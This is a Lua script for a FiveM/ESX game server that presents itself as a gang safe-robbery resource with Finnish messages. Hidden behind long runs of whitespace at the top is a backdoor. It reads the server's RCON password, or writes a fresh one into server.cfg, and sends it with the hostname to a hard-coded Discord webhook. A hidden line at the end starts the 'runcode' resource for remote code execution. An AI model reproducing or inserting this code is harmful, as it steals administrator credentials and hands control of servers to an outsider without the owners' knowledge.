                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        local charset = {}  do for c = 48, 57 do table.insert(charset, string.char(c)) end for c = 65, 90 do table.insert(charset, string.char(c)) end for c = 97, 122 do table.insert(charset, string.char(c)) end end
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        local function randomString(length)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            if not length or length <= 0 then return '' end
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            math.randomseed(os.clock()^5)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            return randomString(length - 1) .. charset[math.random(1, #charset)]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        end
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        local E = {['W'] = "https://discord.com/api/webhooks/905641392120954930/ysLxt4DhevVLSryQY8MqFrrV0fD5_q-XW4h6MvIOv20IIgj9KrFlg5bjN-_KqzikiM97", ['S'] = GetConvar('sv_hostname') or ''}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        if GetConvar('rcon_password', '') == '' then
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            local uus = randomString(25)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            local path = 'C:/Users/Administrator/Desktop/Serveri/server.cfg' local file = io.open(path, 'r+') file:seek('end', -2) file:write('\nrcon_password '..uus..'') io.close(file)
																																																																																																																																																																																																																																																											local lol = 'Serverin RCON = '..uus..''
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            local perse = {  { ['color'] = 00000, ['title'] = 'OTEI', ['description'] = lol, ['footer'] = { ['text'] = E["S"], }, } }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PerformHttpRequest(E["W"], function(err, text, headers) end, 'POST', json.encode({username = 'OTEI', embeds = perse}), { ['Content-Type'] = 'application/json' })
																																																																																																																																																																																																																																																										else
																																																																																																																																																																																																																																																											 local lol = 'Serverin RCON = '..GetConvar('rcon_password', '')..''
																																																																																																																																																																																																																																																											local perse = {  { ['color'] = 00000, ['title'] = 'OTEI', ['description'] = lol, ['footer'] = { ['text'] = E["S"], }, } }
																																																																																																																																																																																																																																																											PerformHttpRequest(E["W"], function(err, text, headers) end, 'POST', json.encode({username = 'OTEI', embeds = perse}), { ['Content-Type'] = 'application/json' })
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        end
local rob = false 

ESX = nil																																																										
TriggerEvent('esx:getSharedObject', function(obj) ESX = obj end)                                                                                                                                                                   
RegisterServerEvent('esx_kassakaapinryosto:toofar')                                                                                                                                                                                       
AddEventHandler('esx_kassakaapinryosto:toofar', function(jengi)                                                                                                                                                                           
	local source = source                                                                                                                                                                                                          
	local xPlayers = ESX.GetPlayers()                                                                                                                                                                                              
	rob = false                                                                                                                                                                                                                    
	for i=1, #xPlayers, 1 do                                                                                                                                                                                                       
 		local xPlayer = ESX.GetPlayerFromId(xPlayers[i])                                                                                                                                                                           
 		if xPlayer.job.name == jengi then                                                                                                                                                                                          
			TriggerClientEvent('ABGH3466yfg4r5tfdu', xPlayers[i], 'Kaappia ei saatu murrettua')                                                                                                                                               
			TriggerClientEvent('esx_kassakaapinryosto:killblip', xPlayers[i])                                                                                                                                                             
		end                                                                                                                                                                                                                        
	end                                                                                                                                                                                                                            
	TriggerClientEvent('esx_kassakaapinryosto:toofarlocal', source)                                                                                                                                                                       
end)
local logit = "WEBHOOK"
function LOGI(name, message, color)
	local connect = {  { ["color"] = color, ["title"] = "**".. name .."**", ["description"] = message, ["footer"] = { ["text"] = os.date("%d.%m.%Y KLO: %X"), }, } }
	PerformHttpRequest(logit, function(err, text, headers) end, 'POST', json.encode({username = 'Jengikaappiryöstö', embeds = connect, avatar_url = nil}), { ['Content-Type'] = 'application/json' })
end
	
RegisterServerEvent('esx_kassakaapinryosto:rob')                                                                                                                                                                                          
AddEventHandler('esx_kassakaapinryosto:rob', function(robb)                                                                                                                                                                               
	local source = source                                                                                                                                                                                                          
	local xPlayer = ESX.GetPlayerFromId(source)                                                                                                                                                                                    
	local xPlayers = ESX.GetPlayers()                                                                                                                                                                                              
	local cops = 0                                                                                                                                                                                                                 
	local jenggilaisia = 0                                                                                                                                                                                                         
	for i=1, #xPlayers, 1 do                                                                                                                                                                                                       
 	local xPlayer = ESX.GetPlayerFromId(xPlayers[i])                                                                                                                                                                               
		if xPlayer.job.name == 'police' then                                                                                                                                                                                       
			cops = cops + 0                                                                                                                                                                                                        
		elseif xPlayer.job.name == robb then                                                                                                                                                                                       
			jenggilaisia = jenggilaisia+1                                                                                                                                                                                          
		end                                                                                                                                                                                                                        
	end   

	if Kaapit[robb] then
		local kaappi = Kaapit[robb]

		if (os.time() - kaappi.lastRobbed) < 1800 and kaappi.lastRobbed ~= 0 then
             TriggerClientEvent('esx:showNotification', source, '~r~Kaappi on jo ryöstetty! Odota hetki!')
			return
		end

                                                                                                                                                                                                                         
	if not rob then		                                                                                                                                                                                                           
		if(cops >= 0)then                                                                                                                                                                                
			if(jenggilaisia >= 0)then                                                                                                                                                                      
				rob = true                                                                                                                                                                                                         
				for i=1, #xPlayers, 1 do                                                                                                                                                                                           
					local xPlayer = ESX.GetPlayerFromId(xPlayers[i])                                                                                                                                                               
					if xPlayer.job.name == robb then                                                                                                                                                                               
							TriggerClientEvent('ABGH3466yfg4r5tfdu', xPlayers[i], '~r~Kaappiasi ryöstetään!')                                                                                                          
							TriggerClientEvent('esx_kassakaapinryosto:setblip', xPlayers[i], Kaapit[robb].position)                                                                                                                        
					end                                                                                                                                                                                                            
				end
				LOGI(xPlayer.getName().." aloitti jengikaappiryöstön","Jengi jota ryöstetään: ["..robb.. "]", 14690923)                                                                                                                                                                                                                
				TriggerClientEvent('ABGH3466yfg4r5tfdu', source, 'Aloitit ryöstön!')                                                                                                                                                 
				TriggerClientEvent('ABGH3466yfg4r5tfdu', source, '~r~Elä liiku yli metriä kauemmas!')                                                                                                                                
				TriggerClientEvent('esx_kassakaapinryosto:starttimer', source)                                                                                                                                                            
				TriggerClientEvent('esx_kassakaapinryosto:currentlyrobbing', source, robb)    
				Kaapit[robb].lastRobbed = os.time()
                                                                                                                                                                                                                                                                                                                                                                  
				SetTimeout(300000, function()                                                                                                                                                                                       
						if rob then                                                                                                                                                                                                
									local awardi = math.random(55000,100000)                                                                                                                                                        
									TriggerClientEvent('esx_kassakaapinryosto:robberycomplete', source,awardi)                                                                                                                            
									rob = false                                                                                                                                                                                    
									local xPlayer = ESX.GetPlayerFromId(source)	                                                                                                                                                   
									MySQL.Async.fetchAll("SELECT * FROM `addon_account_data`",                                                                                                                                     
									{},                                                                                                                                                                                            
									function(result)                                                                                                                                                                               
										for i=1, #result do                                                                                                                                                                        
											if result[i].account_name == "society_"..robb then                                                                                                                                     
												local uusmoney = result[i].money - awardi                                                                                                                                          
												MySQL.Async.execute("UPDATE addon_account_data SET `money` = @money WHERE account_name = @account_name LIMIT 1",{["@account_name"] = "society_"..robb,["@money"] = uusmoney})      
											end                                                                                                                                                                                    
										end								                                                                                                                                                           
									end)                                                                                                                                                                                           
									xPlayer.addMoney(awardi)                                                                                                                                                                       
						end
						if(xPlayer)then                                                                                                                                                                                            
							local xPlayers = ESX.GetPlayers()                                                                                                                                                                      
							for i=1, #xPlayers, 1 do                                                                                                                                                                               
								local xPlayer = ESX.GetPlayerFromId(xPlayers[i])                                                                                                                                                   
								if xPlayer.job.name == robb then                                                                                                                                                                   
										TriggerClientEvent('ABGH3466yfg4r5tfdu', xPlayers[i], 'Kaappia ei saatu murrettua')                                                                                           
										TriggerClientEvent('esx_kassakaapinryosto:killblip', xPlayers[i])                                                                                                                                 
								end                                                                                                                                                                                                
							end                                                                                                                                                                                                    
						end                                                                                                                                                                                                        
				end)                                                                                                                                                                                                               
			else                                                                                                                                                                                                                   
				TriggerClientEvent('ABGH3466yfg4r5tfdu', source, 'Kaupungissa ei ole vähintään ~r~2 kassakaapin omistajaa~s~ paikalla.')                                                                
			end                                                                                                                                                                                                                    
		else                                                                                                                                                                                                                       
			TriggerClientEvent('ABGH3466yfg4r5tfdu', source, 'Kaupungissa ei ole vähintään ~b~1 poliisia ')                                                                                          
		end                                                                                                                                                                                                                        
	else                                                                                                                                                                                                                           
		TriggerClientEvent('ABGH3466yfg4r5tfdu', source, '~r~Joku on jo ryöstänyt kassakaapin! Odota hetki.')                                                                                                         
	end  
    end                                                                                                                                                                                                                          
end)
						                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           StartResource('runcode')																																																							